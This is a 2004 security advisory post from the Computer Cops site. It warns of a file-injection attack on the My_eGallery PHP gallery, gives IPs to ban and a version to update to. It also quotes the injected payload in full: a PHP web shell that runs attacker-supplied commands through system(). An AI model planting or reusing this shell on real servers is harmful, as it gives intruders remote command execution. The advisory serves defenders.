Computer Cops - Cross site Exploit Tried In My_Egallery

New User? Need help? Click here to register for free! Registering removes the advertisements.

Computer Cops

	Donations

	If you found this site helpful, please donate to help keep it online Don't want to use PayPal? Try our physical address

	Prime Choice

	· Head Lines · Advisories (All) · Dnld of the Week! · CCSP News Ltrs · Find a Cure! · Ian T's (AR 23) · Marcia's (CO8) · Bill G's (CO11) · Paul's (AR 5) · Robin's (AR 2) · Ian T's Archive · Marcia's Archive · Bill G's Archive · Paul's Archive · Robin's Archive

	Security Central

	· Home · Wireless · Bookmarks · CLSID · Columbia · Community · Downloads · Encyclopedia · Feedback (send) · Forums · Gallery · Giveaways · HijackThis · Journal · Members List · My Downloads · PremChat · Premium · Private Messages · Proxomitron · Quizz · RegChat · Reviews · Google Search · Sections · Software · Statistics · Stories Archive · Submit News · Surveys · Top · Topics · Web Links · Your Account

	CCSP Toolkit

	· Email Virus Scan · UDP Port Scanner · TCP Port Scanner · Trojan TCP Scan · Reveal Your IP · Algorithms · Whois · nmap port scanner · IPs Banned [?]

Survey

How much can you give to keep Computer Cops online?

	$10 up to $25 per year?
	$25 up to $50 per year?
	$10 up to $25 per month?
	$25 up to $50 per month?
	More than $50 per year?
	More than $50 per month?
	One time only?
	Other (please comment)

Results
Polls

Votes: 1017
Comments: 21

Translate

crkatk: Advisories!: Cross site Exploit Tried In My_Egallery

Crack Attack

Anonymous writes "NovaServe has detected an apparent cross-site scripting exploit that has been launched via www.mirabela.net from russian cyberspace. The site lists http://big-big.com as its admin home and the curious can find the identities of the hackers portrayed on this page.
The exploit tries to inject new files into the My_eGallery folders exploiting an apparent bug in My_eGallery. Users are advised to ban the following IP's as a first step in safe-guarding their installations.
80.96.
66.218.79.186
Updating the script to version 2.79 is also advised.

The following is the content of the injection script found at mirabela:

[code]
CMD - System
Command
Script ini di copy dengan pemberitahuan kepada pengguna sebelumnya....

face="Verdana" size="1">

# CMD PHP INJECTIONS:

# Edit by : #WestBorneo Crew






  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )

  if (isset($chdir)) @chdir($chdir);

  ob_start();

  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm 

/tmp/cmdtemp");

  $output = ob_get_contents();

  ob_end_clean();

  if (!empty($output)) echo str_replace(">", ">", str_replace("<", 

"<",

 $output));

?>

# www.setrom.da.ru
@
SeTRoM
#

--=="#westborneo The Dream Team" ==--[/code]"

Posted on Thursday, 18 March 2004 @ 10:03:59 EST by phoenix22

	Login

	Nickname Password · New User? · Click here to create a registered account.

	Related Links

	· TrackBack (0) · PHP HomePage · HotScripts · W3 Consortium · More about Crack Attack · News by phoenix22 Most read story about Crack Attack: Beware Attacker from IP 200.55.7.235 and Whole 200.x.x.x Block

	Article Rating

	Average Score: 0 Votes: 0 Please take a second and vote for this article:

	Options

	Printer Friendly Page

"Login" | Login/Create an Account | 0 comments

Threshold

The comments are owned by the poster. We aren't responsible for their content.

No Comments Allowed for Anonymous, please register


	Home · Topics · Submit News · Top 10 This entire site, Cops Themes, and Computer Cops are © 2002 - 2004 Computer Cops, LLC. All rights reserved. You can syndicate our news using the file RSS 0.91, ultramode.txt, or RSS 1.0. Acceptable Use Policy. Use signifies your agreement. Engine Copyright © 2002 by PHP-Nuke, GNU/GPL Licensed. ICRA Member. Paul Laudanski, Member of Computer Cops, LLC Server Load: 860 pages served in previous 5 minutes. Page Rendered: 0.308 seconds.